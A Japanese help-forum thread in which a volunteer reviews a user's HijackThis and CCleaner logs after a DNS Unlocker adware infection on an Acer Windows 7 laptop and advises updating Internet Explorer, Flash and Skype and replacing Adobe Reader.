O2 - BHO: Windows Live ID サインイン ヘルパー - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: CypherGuard cguard Service 32bit Edition - CypherTec Inc. - C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe
O23 - Service: CypherGuard cguard Service 64bit Edition - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cgrdsrv64.exe
O23 - Service: CypherGuard Info Service - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cthwsrv64.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: ePower Service (ePowerSvc) - Acer Incorporated - C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 8265 bytes


cc インストール情報 -------------------------

Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer Crystal Eye Webcam CyberLink Corp. 2015/11/06 41.3 MB 1.5.2108.00
Acer ePower Management Acer Incorporated 2015/11/06 6.00.3010
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2015/11/06 1.04.3507
Acer ScreenSaver Acer Incorporated 2015/11/06 20.11.1107.1418
Acer Updater Acer Incorporated 2012/06/20 1.02.3501
Adobe Flash Player 11 ActiveX 64-bit Adobe Systems Incorporated 2015/11/06 6.00 MB 11.2.202.235
Adobe Reader X (10.1.0) MUI Adobe Systems Incorporated 2012/06/20 477 MB 10.1.0
BookLive!Reader BookLive 2012/06/20 87.2 MB 1.8.10
Broadcom Card Reader Driver Installer Broadcom Corporation 2015/11/06 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 2015/11/06 5.100.82.120
CCleaner Piriform 2015/11/06 5.11
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2015/11/06 10.6.9.9
Google Chrome Google Inc. 2015/11/06 48.0.2552.0
Identity Card Acer Incorporated 2015/11/06 1.00.3501
Intel(R) Control Center Intel Corporation 2015/11/06 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 2015/11/06 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation 2015/11/06
Intel(R) Processor Graphics Intel Corporation 2015/11/06 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 2015/11/06 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2015/11/06 10.6 MB 1.23.605.1
Janetter 4.3.1.0 Jane, Inc. 2015/11/06
Launch Manager Acer Inc. 2015/11/06 5.1.15
Microsoft Security Essentials Microsoft Corporation 2015/11/06 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2012/06/20 20.4 MB 4.0.50401.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/06/20 300 KB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2015/11/06 708 KB 8.0.56336
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2015/11/06 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2015/11/06 592 KB 9.0.30729.4148
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 13.6 MB 10.0.30319
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 11.0 MB 10.0.30319
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
newsXpresso esobi Inc. 2012/06/20 7.34 MB 1.0.0.40
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2015/11/06 0.96 GB 9.0.2.9006
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2015/11/06 6.0.1.6543
Skype(TM) 5.5 Skype Technologies S.A. 2012/06/20 17.0 MB 5.5.117
Welcome Center Acer Incorporated 2015/11/06 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2015/11/06 13.2 MB 2.5.1.0



cc windows -----------------------------

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKLM:Run Adobe ARM Adobe Systems Incorporated "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
有効 HKLM:Run BackupManagerTray NTI Corporation "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
有効 HKLM:Run Broadcom Wireless Manager UI Broadcom Corporation C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRAY.exe
有効 HKLM:Run ETDCtrl ELAN Microelectronics Corp. %ProgramFiles%\Elantech\ETDCtrl.exe
有効 HKLM:Run HotKeysCmds Intel Corporation C:\Windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\Windows\system32\igfxtray.exe
有効 HKLM:Run IntelTBRunOnce Microsoft Corporation wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs"
有効 HKLM:Run LManager Dritek System Inc. C:\Program Files (x86)\Launch Manager\LManager.exe
有効 HKLM:Run MSC Microsoft Corporation "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
有効 HKLM:Run Norton Online Backup Symantec Corporation C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
有効 HKLM:Run Persistence Intel Corporation C:\Windows\system32\igfxpers.exe
有効 HKLM:Run Power Management Acer Incorporated C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe
有効 HKLM:Run RTHDVCPL Realtek Semiconductor C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
有効 HKLM:Run SuiteTray Egis Technology Inc. "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"




cc ie----------------------------

有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Helper Adobe PDF Link Helper Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
有効 Helper Windows Live ID Sign-in Helper Microsoft Corp. C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
有効 Helper Windows Live ID サインイン ヘルパー Microsoft Corp. C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll



cc chorome -----------------------------------

有効 App Gmail 8.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.60 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.60_0
有効 App Google ドライブ 14.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0
有効 App YouTube 4.2.8 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0
有効 Extension Adblock Plus 1.9.3 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9.3_0
有効 Extension FireShot - ウェブページのスクリーンショットをキャプチャ 0.98.80 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.80_0
有効 Extension Gestures for Google Chrome™ 1.13.4 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0
有効 Extension Google オフライン ドキュメント 1.0 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.0_1
有効 Extension グランブルーファンタジー[ChromeApps版] 1.2.7 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.7_0



cc スケジュールされたタスク----------------------------

有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task EgisUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\EgisUpdate.exe" -d
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task PMMUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\PMMUpdate.exe"
有効 Task UALU notificatin Acer Incorporated "C:\Program Files\Acer\Acer Updater\UALU.exe"



cc コンテキストメニュー--------------------------------

有効 File MWLIVShellExt Egis Technology Inc. C:\Program Files (x86)\EgisTec MyWinLocker\x64\MWLIVShellExt.dll
有効 File ShredderContextMenu Egis Technology Inc. C:\Program Files (x86)\EgisTec Shredder\x64\ShredderContextMenu.dll
  • あすとろ
  • 2015/11/06 (Fri) 05:28:51
返信フォームへ 
各種更新を見直しましょう
こんばんは。
リカバリもできたとのことですね。
現在のログを見せていただきました。

ではまだ残っている問題点を修正しましょう。

まずIEの更新を再度実行し直してください。
まだ旧バージョンの9のようですから。
>Platform: Windows 7 SP1 (WinNT 6.00.3505)
>MSIE: Internet Explorer v9.00 (9.00.8112.16421)

次に下記アプリがまだ更新できてないのでこれも最新に更新です。
>Adobe Flash Player 11 ActiveX 64-bit Adobe Systems Incorporated 2015/11/06 6.00 MB 11.2.202.235
>Skype(TM) 5.5 Skype Technologies S.A. 2012/06/20 17.0 MB 5.5.117

そして下記はGUを使ってアンインストール推奨です。
>Adobe Reader X (10.1.0) MUI Adobe Systems Incorporated 2012/06/20 477 MB 10.1.0

削除できたら代わりのpdfアプリとして下記を入れておくといいです。
http://www.forest.impress.co.jp/library/software/pdfxchange/

ここまでできたらそこでまたインストール情報ログだけ取り直して、それを現在の状態報告とともにレスください
  • 悪代官
  • 2015/11/06 (Fri) 22:01:29
返信フォームへ 
Re: DNSunlockerの感染
遅くなりました、アップデートも完了したのでログを張っていきます。


7-Zip 15.10 beta (x64) Igor Pavlov 2015/11/07 4.70 MB 15.10
Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer Crystal Eye Webcam CyberLink Corp. 2015/11/06 41.3 MB 1.5.2108.00
Acer ePower Management Acer Incorporated 2015/11/06 6.00.3010
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2015/11/06 1.04.3507
Acer ScreenSaver Acer Incorporated 2015/11/06 20.11.1107.1418
Acer Updater Acer Incorporated 2012/06/20 1.02.3501
Adobe Flash Player 19 ActiveX Adobe Systems Incorporated 2015/11/09 17.4 MB 19.0.0.226
Apple Application Support(32 ビット) Apple Inc. 2015/11/06 114 MB 4.1
Apple Application Support(64 ビット) Apple Inc. 2015/11/06 128 MB 4.1
Apple Mobile Device Support Apple Inc. 2015/11/06 28.0 MB 9.1.0.6
Apple Software Update Apple Inc. 2015/11/06 2.40 MB 2.1.4.131
Bonjour Apple Inc. 2015/11/06 2.01 MB 3.1.0.1
BookLive!Reader BookLive 2012/06/20 87.2 MB 1.8.10
Broadcom Card Reader Driver Installer Broadcom Corporation 2015/11/06 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 2015/11/06 5.100.82.120
CCleaner Piriform 2015/11/06 5.11
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
Dropbox Dropbox, Inc. 2015/11/08 3.10.11
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2015/11/06 10.6.9.9
Google Chrome Google Inc. 2015/11/06 48.0.2552.0
Identity Card Acer Incorporated 2015/11/06 1.00.3501
Intel(R) Control Center Intel Corporation 2015/11/06 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 2015/11/06 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation 2015/11/06
Intel(R) Processor Graphics Intel Corporation 2015/11/06 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 2015/11/06 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2015/11/06 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/11/06 218 MB 12.3.1.23
Jane Style Version 3.83 Jane, Inc. 2015/11/08 3.83
Janetter 4.3.1.0 Jane, Inc. 2015/11/06
Launch Manager Acer Inc. 2015/11/06 5.1.15
Logicool ゲームソフトウェア 8.72 Logicool 2015/11/06 160 MB 8.72.107
Microsoft .NET Framework 4 Client Profile Language Pack - 日本語 Microsoft Corporation 2015/11/07 2.93 MB 4.0.30319
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/11/07 38.8 MB 4.5.51209
Microsoft OneDrive Microsoft Corporation 2015/11/08 36.8 MB 17.3.6201.1019
Microsoft Security Essentials Microsoft Corporation 2015/11/06 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/11/06 50.7 MB 5.1.40728.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/06/20 300 KB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2015/11/06 708 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2015/11/06 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2015/11/07 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2015/11/06 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2015/11/07 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 13.7 MB 10.0.30319
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 11.0 MB 10.0.30319
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 Microsoft Corporation 2015/11/06 20.5 MB 12.0.30501.0
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
newsXpresso esobi Inc. 2012/06/20 7.34 MB 1.0.0.40
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2015/11/06 0.96 GB 9.0.2.9006
PDF-Viewer Tracker Software Products Ltd 2015/11/09 52.8 MB 2.5.315.0
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2015/11/06 6.0.1.6543
Skype(TM) 7.0 Skype Technologies S.A. 2015/11/07 47.9 MB 7.0.102
Welcome Center Acer Incorporated 2015/11/06 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2015/11/06 13.2 MB 2.5.1.0
  • あすとろ
  • 2015/11/09 (Mon) 18:50:01
返信フォームへ 
一度削除後に入れなおしを
レスが遅くなってすみません。

ログを見たところ、Adobeは更新できてますがSkypeはまだ最新じゃないですね。
>Skype(TM) 7.0 Skype Technologies S.A. 2015/11/07 47.9 MB 7.0.102

これは更新がうまくできませんか?
一応再確認してみてください、
SkypeをGU上から「エントリの削除」したあと、再度公式サイトから最新版をいれなおして、それで最新になったかどうかをまた教えてください。
それとIEも最新版の11になったかどうかも教えてください
  • 悪代官
  • 2015/11/10 (Tue) 22:08:55
返信フォームへ 
Re: DNSunlockerの感染
確認してみたところ、skypeに更新がきていたのでアップデートしました。

ieは公式サイトから入れなおしたので最新バージョンになっていると思われます
  • あすとろ
  • 2015/11/12 (Thu) 07:07:06
返信フォームへ 
一応再度ログを見せてください
おはようございます。

>確認してみたところ、skypeに更新がきていたのでアップデートしました。

>ieは公式サイトから入れなおしたので最新バージョンになっていると思われます

はい、更新もできましたか。
では再度確認しておきましょう。
お手数ですがHJTとインストール情報のログだけ取り直して、またそれを見せてください
  • 悪代官
  • 2015/11/12 (Thu) 07:33:35
返信フォームへ 
Re: DNSunlockerの感染
ログを張っていきます。

hjt ------------------------

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 2:23:53, on 2015/11/13
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.18098)


Boot mode: Normal

Running processes:
C:\Users\【ユーザー名】\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Desktop\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: Windows Live ID サインイン ヘルパー - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [OneDrive] "C:\Users\【ユーザー名】\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device Service - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: CypherGuard cguard Service 32bit Edition - CypherTec Inc. - C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe
O23 - Service: CypherGuard cguard Service 64bit Edition - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cgrdsrv64.exe
O23 - Service: CypherGuard Info Service - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cthwsrv64.exe
